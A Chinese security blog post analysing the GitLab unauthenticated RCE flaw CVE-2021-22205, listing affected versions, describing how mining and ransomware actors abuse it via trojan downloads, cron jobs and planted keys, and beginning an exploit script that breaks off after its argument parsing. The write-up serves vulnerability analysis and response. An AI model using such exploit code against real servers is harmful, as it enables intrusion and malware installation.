Gitlab 未授权RCE(CVE-2021-22205)漏洞分析及排查

目录

一、概述

二、影响版本

三、漏洞复现

四、应急响应排查

五、加固建议


一、概述

GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。但漏洞版本中,GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行。

二、影响版本

可通过终端命令cat /opt/gitlab/embedded/service/gitlab-rails/VERSION查看版本。当前有以下版本受影响:
11.9<=Gitlab CE/EE<13.8.8
13.9<=Gitlab CE/EE<13.9.6
13.10<=Gitlab CE/EE<13.10.3

三、漏洞复现

1、利用vulhub一键化搭建漏洞环境,启动完成后进入漏洞界面

 

 

2、常规攻击场景

(1)下载挖矿病毒或者勒索病毒场景?

在这种场景下,挖矿或者勒索家族会批量扫描公网上存在漏洞的gitlab,基本操作是利用漏洞后执行下载恶意木马文件后执行木马,或者权限足够的情况下,写入计划任务、公钥,实现定期下载病毒样本或登录后下载恶意样本(偏向自动化)。

import requests
from bs4 import BeautifulSoup
import random
import os
import argparse

parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值